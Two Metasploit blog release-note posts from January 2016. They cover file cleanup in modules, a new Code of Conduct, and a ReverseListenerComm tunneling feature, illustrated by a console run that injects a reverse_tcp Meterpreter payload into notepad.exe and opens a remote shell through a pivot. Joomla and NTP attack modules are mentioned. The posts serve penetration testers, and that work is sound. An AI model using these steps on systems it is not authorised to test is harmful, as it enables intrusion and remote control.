
Weekly Metasploit Wrapup

Posted by egypt Employee Jan 22, 2016

I'm not your mother, clean up after yourself.

 

An old friend of mine, axis2_deployer, is a fun authenticated code execution module that takes advantage of Axis2's ability to deploy new applications on a web server. It used to be a messy friend, leaving its files all over the living room floor for you to clean up manually. As of #6457, you don't have to worry about those files any more, because it uses the FileDropper mixin. When you're writing a module that requires putting something on the file system, the polite thing to do is delete it when you're done, and that's exactly what FileDropper is for. Just include the mixin and call register_file_for_cleanup with the remote path, and when a session is created Metasploit will use it to delete your mess.

 

Code of Conduct

 

The wider development community has been talking about Codes of Conduct for a while now as a result of a lot of poor behavior. The Metasploit Project has been fortunate not to have had to deal with jerks on the scale that some other projects have, but in order to head those jerks off at the pass, Metasploit now has a Code of Conduct.

Here's an excerpt that explains the motivation:

  We are committed to making participation in this project a harassment-free experience for everyone, regardless of level of experience, gender, gender identity and expression, sexual orientation, disability, personal appearance, body size, race, ethnicity, age, religion, or nationality.

This CoC provides a way for you to contact us and let us know about unacceptable behavior in the community as well as providing guidelines so people know what to expect when such things must be enforced.

  Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.

 

For developers and potential contributors, this means we've got your back. The goal is to give you confidence that if things go wrong, there is already a plan in place and rules that can help. I think it's also important to point out that there was zero dissent in the Pull Request discussion among current committers about whether to adopt this CoC. The building isn't currently on fire, but we as a community, and I personally, want you to be safe putting it out if one comes along.

 

The previous law of the land in the People's Republic of Metasploit was an informal adherence to Wheaton's Law, and that still stands. By adopting a more formal and explicit set of rules, we intend to foster a more welcoming environment where everyone feels comfortable making their first Pull Request.

 

New Modules

Auxiliary and post modules

 

Get it

 

As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff is available on GitHub: 4.11.6...4.11.7

 

Happy hacking.


Weekly Metasploit Wrapup

Posted by egypt Employee Jan 11, 2016

Aaaaaand we're back! Last week was the first weekly update of the year, and it comes with some super fun stuff.

Tunneling

The latest update allows you to tunnel reverse_tcp sessions over a compromised machine in a slightly less painful way. There is now a new datastore option, ReverseListenerComm, which lets you tell a meterpreter session to tunnel connections back to your payload handler. Here's an example run to give you the idea:

 

msf exploit(payload_inject) > show options


Module options (exploit/windows/local/payload_inject):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   NEWPROCESS  true             no        New notepad.exe to inject to
   PID                          no        Process Identifier to inject of process to inject payload.
   SESSION                      yes       The session to run this module on. 

Payload options (windows/meterpreter/reverse_tcp):


   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: , , seh, thread, process, none)
   LHOST     127.0.0.1        yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:


   Id  Name
   --  ----
   0   Windows


msf exploit(payload_inject) > set ReverseListenerComm 1
ReverseListenerComm => 1

msf exploit(payload_inject) > set SESSION 1
SESSION => 1
msf exploit(payload_inject) > run 

[*] Started reverse handler on 127.0.0.1:4444 via the meterpreter on session 1
[*] Running module against WIN-2DE8F2QP867
[*] Launching notepad.exe...
[*] Preparing 'windows/meterpreter/reverse_tcp' for PID 3092
[*] Sending stage (884270 bytes)
[*] Meterpreter session 2 opened (192.168.5.101-192.168.5.1:4444 -> 127.0.0.1:63173) at 2015-05-20 00:09:44 +0100

meterpreter >

 

The really important line there is this:

[*] Started reverse handler on 127.0.0.1:4444 via the meterpreter on session 1

The compromised machine is listening on its localhost for the new connection, but it doesn't have to be localhost: you can tell it to listen on an external address and use psexec against a second internal machine. This used to be possible by creating a route and setting your LHOST to a victim machine's IP address within that route, but it wasn't really clear how to do it and the settings were quite error prone; now it's just a single option to tell Metasploit explicitly where to listen for the payload.

Super fun modules

Joomla

This update comes with a pre-authentication exploit for Joomla, the popular CMS, another in a rich and storied history of deserialization bugs. We've also abstracted some common things into a Joomla mixin, so the next time one of these comes along, writing the exploit will be faster and easier.

Hacking Time


From the module description:

The end goal is to cause ntpd to declare the legitimate peers "false tickers" and choose the attacking clients as the preferred peers, allowing these peers to control time.

Now you, too, can go... NAK to the Future!

 

Exploit modules

 

Auxiliary and post modules

 

 

As always, you can get all these modules and improvements with a simple msfupdate and the full diff is available on GitHub: 4.11.5-2015121501...4.11.5-2016010401
